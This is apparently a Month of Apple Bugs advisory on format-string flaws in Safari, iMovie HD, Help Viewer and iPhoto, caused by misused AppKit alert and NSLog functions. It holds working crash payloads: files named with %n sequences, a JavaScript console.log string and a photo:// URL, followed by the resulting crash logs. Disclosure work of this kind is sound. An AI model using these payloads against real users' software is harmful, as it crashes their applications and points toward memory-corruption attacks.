Summary
As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us Apple's AppKit framework and a few Apple Developers are all we need. Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apples Help Viewer, Safari and iMovie to the list. Coincidentally iPhoto will also be making a return visit.
Affected versions
The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)
Proof of concept, exploit or instructions to reproduce
As we have mentioned in past postings the origins of these problems are related to the following functions from Apple's AppKit framework.
* NSBeginAlertSheet * NSBeginCriticalAlertSheet * NSBeginInformationalAlertSheet * NSGetAlertPanel * NSGetCriticalAlertPanel * NSGetInformationalAlertPanel * NSReleaseAlertPanel * NSRunAlertPanel * NSRunCriticalAlertPanel * NSRunInformationalAlertPanel * NSLog
Multiple developers of Apple based software including Apples own developers seem to have a misunderstanding of how to properly use the above functions. For the sake of lulz alone a montage must ensue...
Safari, iMovie and Help Viewer:
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls Help Viewer.crash.log Safari.crash.log iMovie HD.crash.log
Safari:
joe-schmoes-computer:/tmp js$ cat test.html
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>
joe-schmoes-computer:/tmp js$ open test.html
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log
iPhoto:
joe-schmoes-computer:/tmp js$ open 'photo://%25n%25n%25n%25n%25n%25n' joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/ iPhoto.crash.log<
Debugging Montage
iPhoto:
Version: 6.0.5 (6.0.5) Build Version: 2 Project Name: iPhotoProject Source Version: 3160000 PID: 874 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x925da956 Thread 0 Crashed: 0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976 1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504 2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018 3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122 4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162 5 com.apple.Foundation 0x92678e6c +[NSString localizedStringWithFormat:] + 129 6 com.apple.iPhoto 0x0002ae3a 0x1000 + 171578 7 com.apple.iPhoto 0x0031298f 0x1000 + 3217807
Safari:
Version: 2.0.4 (419.3) Build Version: 7 Project Name: WebBrowser Source Version: 4190300 PID: 455 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000020 Thread 0 Crashed: 0 libobjc.A.dylib 0x90a55380 objc_msgSend + 16 1 com.apple.AppKit 0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278 2 com.apple.AppKit 0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424 3 com.apple.AppKit 0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168 4 com.apple.AppKit 0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877 5 com.apple.AppKit 0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074 6 com.apple.AppKit 0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$ 7 com.apple.AppKit 0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122 8 com.apple.AppKit 0x9335f3bf _NXDoLocalRunAlertSheet + 922 9 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100 10 com.apple.Safari 0x0008300f 0x1000 + 532495
Help Viewer:
Version: 3.0.0 (144.1) Build Version: 20 Project Name: HelpViewer Source Version: 1440800 PID: 970 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac Thread 0 Crashed: 0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976 1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504 2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018 3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122 4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162 5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55 6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144 7 com.apple.AppKit 0x9335f2e0 _NXDoLocalRunAlertSheet + 699 8 com.apple.AppKit 0x9335f022 NSBeginAlertSheet + 100 9 com.apple.helpui 0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165 10 com.apple.helpui 0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512
iMovie HD:
Version: 6.0.3 (6.0.3) Build Version: 14 Project Name: iMovieApp Source Version: 2670200 PID: 1013 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x00000000 Thread 0 Crashed: 0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976 1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504 2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018 3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122 4 com.apple.Foundation 0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162 5 com.apple.Foundation 0x925fc670 -[NSString initWithFormat:arguments:] + 55 6 com.apple.AppKit 0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144 7 com.apple.AppKit 0x934ac77a _NXDoLocalRunAlertPanel + 683 8 com.apple.AppKit 0x93588ad6 NSRunCriticalAlertPanel + 69 9 com.apple.iMovie 0x000f3f3e 0x1000 + 995134 10 com.apple.iMovie 0x000f3fcf 0x1000 + 995279Safari (debug enabled):
defaults write com.apple.Safari IncludeDebugMenu 1
Version: 2.0.4 (419.3) Build Version: 7 Project Name: WebBrowser Source Version: 4190300 PID: 1042 Thread: 0 Exception: EXC_BAD_ACCESS (0x0001) Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c Thread 0 Crashed: 0 libSystem.B.dylib 0x9000c0c1 __vfprintf + 4976 1 libSystem.B.dylib 0x90100ea9 snprintf_l + 504 2 com.apple.CoreFoundation 0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018 3 com.apple.CoreFoundation 0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122 4 com.apple.Foundation 0x92605ab9 NSLogv + 85 5 com.apple.Foundation 0x926433a5 NSLog + 27 6 libobjc.A.dylib 0x90a58c56 objc_msgSendv + 54 7 com.apple.Foundation 0x925f443e -[NSInvocation invoke] + 932 8 com.apple.JavaScriptCore 0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047 9 com.apple.JavaScriptCore 0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228 10 com.apple.JavaScriptCore 0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158
Notes
Exploitation conditions
All of these functions have behavior similar to printf(). Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution.
Workaround or temporary solution
Seek out Landon Fuller and he shall destroy all that is evil!
All your AlertPanel are belong to us.